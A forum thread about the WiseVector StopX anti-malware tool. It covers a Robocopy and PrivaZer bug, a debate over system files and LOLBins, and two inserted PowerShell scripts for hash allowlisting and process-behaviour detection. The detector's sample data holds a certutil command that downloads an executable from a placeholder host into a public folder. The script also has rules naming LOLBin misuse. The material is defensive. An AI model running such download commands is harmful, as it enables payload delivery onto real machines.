WiseVector Stop-X

Discussion in 'other anti-malware software' started by bellgamin, Aug 10, 2020.

  1. WiseVector

    WiseVector Registered Member

    Joined:
    Aug 16, 2020
    Posts:
    543
    Location:
    China
  2. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,240
    Location:
    Among the gum trees
    Oh, great! :thumb:

    Will that fix be included in the next release?

    Thank you.
     
  3. bellgamin

    bellgamin Registered Member

    Joined:
    Aug 1, 2002
    Posts:
    8,102
    Location:
    Hawaii
    Robocopy.exe is a NON-system process included with Windows. I hope that WV will not henceforth be set to ignore Robocopy.exe because it has been a favorite target of malware programmers in the past. Namely, they write virus files with malicious scripts and save them as Robocopy.exe.

    From this standpoint, the paid version of WV might consider inclusion of a whitelist, including a SHA-256 fingerprint of each safe process on a user's computer.
     
    Last edited: Sep 10, 2020
  4. cruelsister

    cruelsister Registered Member

    Joined:
    Nov 6, 2007
    Posts:
    1,649
    Location:
    Paris
    I actually prefer Xcopy.
     
  5. Tarnak

    Tarnak Registered Member

    Joined:
    Feb 5, 2007
    Posts:
    5,296
    @WiseVector

    More curiosity, than worry. ;)
     
  6. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    11,126
    Location:
    U.S.A. (South)
    :thumb: Pretty good alternative.
     
    Last edited: Sep 10, 2020
  7. WiseVector

    WiseVector Registered Member

    Joined:
    Aug 16, 2020
    Posts:
    543
    Location:
    China
The behavior analysis module has been updated automatically and this issue was already resolved yesterday. If you enabled the auto-update of WVSX, you will find out. :)
     
    Last edited: Sep 10, 2020
  8. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,240
    Location:
    Among the gum trees
    Oh! I didn't realise modules were updated separately too.

    Very nice! :thumb:
     
    Last edited: Sep 10, 2020
  9. WiseVector

    WiseVector Registered Member

    Joined:
    Aug 16, 2020
    Posts:
    543
    Location:
    China
    Thanks for your advice.
"Robocopy.exe" is a system file included in Windows 10. You might be confusing it with some third-party app.
Our behavior analysis module had a problem when analyzing hundreds of thousands of "Robocopy.exe" launches in a very short time. We have adjusted the module, but have not whitelisted the process itself.
     
  10. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,240
    Location:
    Among the gum trees
    PrivaZer fix confirmed! :)
     
  11. bellgamin

    bellgamin Registered Member

    Joined:
    Aug 1, 2002
    Posts:
    8,102
    Location:
    Hawaii
    It is NOT a system file because it can be easily deleted with NO adverse effect on Windows OS. Of course, deletion of Robocopy.exe will adversely affect those programs (such as PrivaZer) that use it. I know of 3 large networks where Robocopy.exe has been intentionally removed from all of their serviced computers.

    As to your remark that it is included in Windows 10 -- I'm sure you know that it is also included in Vista, Win 7, Win8, & Win8.1.

    I do not get confused quite that easily. Any "third party APP" named Robocopy.exe is almost certainly malware. A SHA-256 fingerprint will distinguish the legitimate Microsoft Robocopy.exe from any counterfeit bearing that same file name.
     
    Last edited: Sep 10, 2020
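The allowlist bellgamin describes, as an added example and not WiseVector's own code: a PowerShell script that records the path, SHA-256 and signer of the Windows copy tools on a known-clean machine, then checks any file of the same name against that record. The allowlist file location and the set of tool names are assumptions; no hash values are hard-coded, because they change with every Windows update and must be taken from your own system.

```powershell
# Added example (not WiseVector's code). Builds a SHA-256 allowlist for the
# Windows command-line tools discussed in the thread and verifies a file
# against it. $Tools and $AllowlistPath are assumptions for the example.

$Tools = 'robocopy.exe', 'xcopy.exe', 'certutil.exe', 'attrib.exe'
$AllowlistPath = Join-Path $env:ProgramData 'ProcessAllowlist.json'   # assumed location

function New-ProcessAllowlist {
    # Run once on a known-clean machine. Records path, SHA-256 and signer of
    # each tool so a counterfeit carrying the same name can be told apart.
    $entries = foreach ($name in $Tools) {
        $path = Join-Path $env:SystemRoot "System32\$name"
        if (-not (Test-Path $path)) { continue }
        # Most System32 binaries are catalog-signed; Get-AuthenticodeSignature
        # resolves catalog signatures on Windows 8 and later.
        $sig = Get-AuthenticodeSignature -FilePath $path
        [pscustomobject]@{
            Name   = $name
            Path   = $path
            Sha256 = (Get-FileHash -Path $path -Algorithm SHA256).Hash
            Signer = $sig.SignerCertificate.Subject
            Status = $sig.Status.ToString()
        }
    }
    $entries | ConvertTo-Json | Set-Content -Path $AllowlistPath -Encoding UTF8
    return $entries
}

function Test-ProcessAgainstAllowlist {
    param([Parameter(Mandatory)][string]$FilePath)
    $allow  = Get-Content -Path $AllowlistPath -Raw | ConvertFrom-Json
    $name   = [IO.Path]::GetFileName($FilePath)
    $entry  = $allow | Where-Object { $_.Name -ieq $name } | Select-Object -First 1
    $result = [ordered]@{ Path = $FilePath; Verdict = 'Unknown'; Reason = 'name not in allowlist' }
    if (-not $entry) { return [pscustomobject]$result }

    $hash = (Get-FileHash -Path $FilePath -Algorithm SHA256).Hash
    $sig  = Get-AuthenticodeSignature -FilePath $FilePath

    if ($hash -ne $entry.Sha256) {
        # Same name, different bytes: either a Windows update replaced the
        # binary (re-run New-ProcessAllowlist) or this is a counterfeit.
        $result.Verdict = 'Mismatch'
        $result.Reason  = "SHA-256 differs from the allowlisted $($entry.Name)"
    } elseif ($FilePath -ine $entry.Path) {
        # Right bytes, wrong location: a copy of the genuine tool dropped into
        # a user-writable directory still deserves a look.
        $result.Verdict = 'Suspicious'
        $result.Reason  = "expected location $($entry.Path)"
    } elseif ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
        $result.Verdict = 'Suspicious'
        $result.Reason  = "signature status $($sig.Status)"
    } else {
        $result.Verdict = 'Allowed'
        $result.Reason  = 'hash, path and Microsoft signature all match'
    }
    return [pscustomobject]$result
}

# Usage:
# New-ProcessAllowlist | Format-Table
# Test-ProcessAgainstAllowlist -FilePath (Join-Path $env:SystemRoot 'System32\robocopy.exe')
# Test-ProcessAgainstAllowlist -FilePath (Join-Path $env:TEMP 'robocopy.exe')
```

Two caveats a practitioner would want: a pinned hash goes stale at every cumulative update, which is why products tend to rely on the Authenticode or catalog signature plus the expected path rather than on the hash alone; and a hash check only answers "is this Microsoft's Robocopy.exe", not "is the genuine Robocopy.exe being used for something it should not be".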
  12. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,240
    Location:
    Among the gum trees
He must have only invited one friend this time, again after running PrivaZer.

[Attachment: Multi bots.PNG]
     
  13. WiseVector

    WiseVector Registered Member

    Joined:
    Aug 16, 2020
    Posts:
    543
    Location:
    China
Thanks for your explanation.
We might have different understandings of Robocopy.exe. :) Since it is made by MS and located in the system directory, we think it is a system file.
     
    Last edited: Sep 11, 2020
  14. WiseVector

    WiseVector Registered Member

    Joined:
    Aug 16, 2020
    Posts:
    543
    Location:
    China
    1. You have WVSX updated to the latest V2.67, right?
    2. The way we tested PrivaZer was: click Scan-in-depth->Computer->Scan->Clean. Everything went smoothly. What's your steps?
3. Can you please send the file named "v2-*-*-*-*.dmp" (* represents any number) in the WiseVector StopX installation folder to support@wisevector.com?
    This is the crash dump file of WVSX, thanks.
     
  15. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,240
    Location:
    Among the gum trees
    Hi WiseVector,

    Email with two logs sent.
    Yes.
    I click Scan-in-depth > Scan > I have "Start cleaning" unchecked > Clean.

    Thanks.
     
  16. bellgamin

    bellgamin Registered Member

    Joined:
    Aug 1, 2002
    Posts:
    8,102
    Location:
    Hawaii
    If I stand in a garage, that does not make me an automobile. Removal of a true system file will sooner or later (usually sooner) cause an operating system problem. Windows gets along just fine without Robocopy.exe.
     
  17. cruelsister

    cruelsister Registered Member

    Joined:
    Nov 6, 2007
    Posts:
    1,649
    Location:
    Paris
One really can't just get rid of these System32 command line processes like Robocopy, certutil, attrib, etc. just because they can be used for nefarious purposes (can you say LOLBin?); they are too well ingrained in the Windows OS to be trashed.

It should be said that although LOLBins are a hot topic currently, their use has actually been occurring for a very long time (not meaning to dredge up the residua of a misspent youth, but I should note that in years past my Barbie used Xcopy to drop a Bot on Ken's computer).
     
    Last edited: Sep 11, 2020
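The LOLBin misuse cruelsister describes, together with the failure mode WiseVector reported earlier in the thread (the behavior module choking on hundreds of thousands of Robocopy.exe launches in a short time), as an added example that is not WiseVector's code or anything from the thread: a small behavior check over process-creation records shaped like Sysmon Event ID 1 (UtcTime, Image, ParentImage, CommandLine). Instead of deleting the tools, it flags the patterns that make them interesting (a LOLBin name running outside System32, certutil fetching or decoding a payload, a copy tool touching a UNC path) and coalesces a burst of identical launches into one finding so the per-event logic is not run hundreds of thousands of times. The sample records, the cleaner path and the burst threshold are constructed for this example.

```powershell
# Added example (not WiseVector's code). Behavior check over constructed
# process-creation records; $LolBins, $BurstThreshold and the sample events
# are assumptions for the example.

$LolBins = 'robocopy.exe', 'xcopy.exe', 'certutil.exe', 'attrib.exe'
$BurstThreshold = 3   # assumed: same image+parent launched this often within one second

# Constructed sample: a cleaner spawning Robocopy repeatedly, then two
# launches that look like the misuse discussed above.
$SampleEvents = @(
    foreach ($i in 0..9) {
        @{ UtcTime     = '2020-09-10 10:00:00.' + ('{0:D3}' -f ($i * 90))
           Image       = 'C:\Windows\System32\Robocopy.exe'
           ParentImage = 'C:\Program Files\Cleaner\Cleaner.exe'
           CommandLine = "Robocopy.exe C:\Temp\empty C:\Temp\old$i /MIR" }
    }
    @{ UtcTime     = '2020-09-10 10:05:00.000'; Image = 'C:\Users\Public\Robocopy.exe'
       ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'Robocopy.exe \\10.0.0.5\share C:\Users\Public\drop /E' }
    @{ UtcTime     = '2020-09-10 10:06:00.000'; Image = 'C:\Windows\System32\certutil.exe'
       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'certutil -urlcache -split -f http://example.invalid/x.exe C:\Users\Public\x.exe' }
)

function Get-ProcessFindings {
    param([Parameter(Mandatory)][object[]]$Events)
    $findings = New-Object System.Collections.Generic.List[object]
    $seen     = @{}   # image|parent|second -> launches counted so far
    $bursts   = @{}   # same key -> the single coalesced finding

    foreach ($e in $Events) {
        $name = [IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        if ($LolBins -notcontains $name) { continue }

        # Burst handling first: the same tool launched by the same parent
        # many times in one second is one thing to reason about, not N.
        $second = ([datetime]$e.UtcTime).ToString('yyyy-MM-dd HH:mm:ss')
        $key    = "$($e.Image)|$($e.ParentImage)|$second"
        $seen[$key] = 1 + [int]$seen[$key]
        if ($bursts.ContainsKey($key)) { $bursts[$key].Count++; continue }
        if ($seen[$key] -ge $BurstThreshold) {
            $b = [pscustomobject]@{ Time = $e.UtcTime; Image = $e.Image; Parent = $e.ParentImage
                                    Severity = 'Info'; Count = $seen[$key]
                                    Reason = 'burst of identical launches coalesced into one finding' }
            $bursts[$key] = $b; $findings.Add($b); continue
        }

        $reasons = @()
        if ($e.Image -notmatch '^[A-Za-z]:\\Windows\\(System32|SysWOW64)\\') {
            $reasons += 'LOLBin name running outside System32: possible counterfeit'
        }
        if ($name -eq 'certutil.exe' -and $e.CommandLine -match '-urlcache|-decode') {
            $reasons += 'certutil used to download or decode a payload'
        }
        if (($name -eq 'robocopy.exe' -or $name -eq 'xcopy.exe') -and $e.CommandLine -match '\\\\[\w.-]+\\') {
            $reasons += 'copy tool reading from or writing to a UNC path'
        }
        foreach ($r in $reasons) {
            $findings.Add([pscustomobject]@{ Time = $e.UtcTime; Image = $e.Image; Parent = $e.ParentImage
                                             Severity = 'Alert'; Count = 1; Reason = $r })
        }
    }
    return $findings
}

Get-ProcessFindings -Events $SampleEvents | Format-Table Time, Severity, Count, Reason -AutoSize
```

On the sample, the ten cleaner-driven Robocopy launches produce one Info finding with Count 10 rather than ten verdicts, the Robocopy.exe under C:\Users\Public produces two Alerts (wrong location, UNC source), and the certutil launch produces one. The path rule is the cheap counterpart of the hash check discussed earlier in the thread: a genuine Microsoft binary does not normally run from a user-writable directory, and the command-line rules catch misuse of the genuine binary that a hash can never see.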
  18. roger_m

    roger_m Registered Member

    Joined:
    Jan 25, 2009
    Posts:
    8,629
    Any file which resides in the System32 folder and is put there when Windows is installed, is classified as a system file, whether the file is actually critical to the operation of Windows or not.
     
    Last edited: Sep 11, 2020
  19. WiseVector

    WiseVector Registered Member

    Joined:
    Aug 16, 2020
    Posts:
    543
    Location:
    China
    Please try this: click Settings of WVSX->Basic->Real-Time Protection->Set Up->Uncheck "Scan on file creation" and observe whether this issue will happen again or not.
    Thanks for your help!
     
  20. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,559
    Location:
    The Netherlands
    Yes but to clarify, how did you test this? I assume you disabled realtime protection and enabled only memory protection? Because in order to block code injection and process hollowing, you will need to let the malware run. That's why I asked Cruelsister how she tested NetWalker and Agent Tesla.
     
  21. WiseVector

    WiseVector Registered Member

    Joined:
    Aug 16, 2020
    Posts:
    543
    Location:
    China
    You need to disable real-time protection to run the malware if it is already detected by static scanning.
     
  22. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,240
    Location:
    Among the gum trees
    Did that. Unfortunately, while running PrivaZer on that machine a second SysTray icon appeared again. For whatever reason, this machine does not show the same behaviour.

    Did the logs show anything interesting?

    Thanks.
     
  23. WiseVector

    WiseVector Registered Member

    Joined:
    Aug 16, 2020
    Posts:
    543
    Location:
    China
    Hi,
We still need time to analyze this log, and we would like to narrow the scope of analysis; that's why I asked you to uncheck "Scan on file creation" first.

Can you please tell me what the difference between the two computers is? Does one of them have more than two AVs installed and the other only WVSX?
     
  24. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,240
    Location:
    Among the gum trees
    Both run the same security + mostly the same other software.
     
  25. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    10,240
    Location:
    Among the gum trees
    I think I disabled the wrong setting last time so I ran PrivaZer again with "Scan on file creation" unchecked. This time no other icons showed up.

    Thanks.
     